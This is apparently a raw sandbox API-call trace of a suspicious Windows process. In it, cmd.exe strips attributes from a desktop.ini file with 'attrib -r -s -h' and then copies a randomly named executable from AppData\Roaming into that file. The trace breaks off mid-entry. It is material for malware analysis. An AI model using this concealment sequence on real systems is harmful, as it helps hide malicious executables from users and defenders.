0x0 [0130.784] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2004a8, lpFilePart=0x12f424 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f424*="Desktop") returned 0x18 [0130.784] SetErrorMode (uMode=0x0) returned 0x1 [0130.785] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.785] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.790] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.790] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f1a0) returned 0xffffffff [0130.790] GetLastError () returned 0x2 [0130.790] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12f1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f1a0) returned 0xffffffff [0130.791] GetLastError () returned 0x2 [0130.791] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f1a0) returned 0x202530 [0130.791] FindClose (in: hFindFile=0x202530 | out: hFindFile=0x202530) returned 1 [0130.791] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12f1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f1a0) returned 0xffffffff [0130.791] GetLastError () returned 0x2 [0130.791] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f1a0) returned 0x202530 [0130.791] FindClose (in: hFindFile=0x202530 | out: hFindFile=0x202530) returned 1 [0130.791] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.791] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.791] GetConsoleTitleW (in: lpConsoleTitle=0x12f698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.792] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f520, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f5e8 | out: lpAttributeList=0x12f520, lpSize=0x12f5e8) returned 1 [0130.792] UpdateProcThreadAttribute (in: lpAttributeList=0x12f520, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f5e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f520, lpPreviousValue=0x0) returned 1 [0130.792] GetStartupInfoW (in: lpStartupInfo=0x12f4dc | out: lpStartupInfo=0x12f4dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0130.792] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.793] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f57c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f5c8 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", lpProcessInformation=0x12f5c8*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9d4, dwThreadId=0x9cc)) returned 1 [0130.840] CloseHandle (hObject=0x4c) returned 1 [0130.840] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.840] GetEnvironmentStringsW () returned 0x2009d0* [0130.840] FreeEnvironmentStringsW (penv=0x2009d0) returned 1 [0130.840] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0131.037] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f4bc | out: lpExitCode=0x12f4bc*=0x0) returned 1 [0131.037] CloseHandle (hObject=0x50) returned 1 [0131.038] _vsnwprintf (in: _Buffer=0x12f604, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f4c8 | out: _Buffer="00000000") returned 8 [0131.038] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0131.038] GetEnvironmentStringsW () returned 0x202580* [0131.038] FreeEnvironmentStringsW (penv=0x202580) returned 1 [0131.038] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0131.038] GetEnvironmentStringsW () returned 0x202580* [0131.038] FreeEnvironmentStringsW (penv=0x202580) returned 1 [0131.038] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f520 | out: lpAttributeList=0x12f520) [0131.038] GetConsoleTitleW (in: lpConsoleTitle=0x12f8a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.038] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e918, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x12e91c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12e918*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0131.039] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0131.039] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0131.039] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0131.039] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\desktop.ini")) returned 0xffffffff [0131.039] GetLastError () returned 0x2 [0131.039] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x10 [0131.039] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0131.039] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0131.039] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\desktop.ini")) returned 0xffffffff [0131.039] GetLastError () returned 0x2 [0131.039] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x20360c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20360c) returned 0xffffffff [0131.040] GetLastError () returned 0x2 [0131.040] _get_osfhandle (_FileHandle=2) returned 0xb [0131.040] GetFileType (hFile=0xb) returned 0x2 [0131.040] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0131.040] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f318 | out: lpMode=0x12f318) returned 1 [0131.041] _get_osfhandle (_FileHandle=2) returned 0xb [0131.041] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12f34c | out: lpConsoleScreenBufferInfo=0x12f34c) returned 1 [0131.042] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0131.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.042] GetFileType (hFile=0x7) returned 0x2 [0131.042] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0131.042] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12fa3c | out: lpMode=0x12fa3c) returned 1 [0131.043] _dup (_FileHandle=1) returned 3 [0131.043] _close (_FileHandle=1) returned 0 [0131.043] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini", _String2="con") returned -53 [0131.043] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12fa0c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0131.043] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0131.043] GetConsoleTitleW (in: lpConsoleTitle=0x12f83c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.043] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x12f3a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f3a0) returned 0x200820 [0131.044] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0131.044] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0131.044] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0131.044] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12e2ac, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0131.044] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0131.044] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.044] GetFileType (hFile=0x58) returned 0x1 [0131.044] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.044] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x12e304 | out: lpFileSizeHigh=0x12e304*=0x0) returned 0x7d600 [0131.044] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.044] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.044] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.044] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.044] GetFileType (hFile=0x50) returned 0x1 [0131.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.044] GetFileType (hFile=0x50) returned 0x1 [0131.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.044] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.045] GetFileType (hFile=0x50) returned 0x1 [0131.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.045] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.045] GetFileType (hFile=0x50) returned 0x1 [0131.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.045] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.045] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.046] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.046] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.047] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.047] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.048] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.048] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.049] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.049] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, 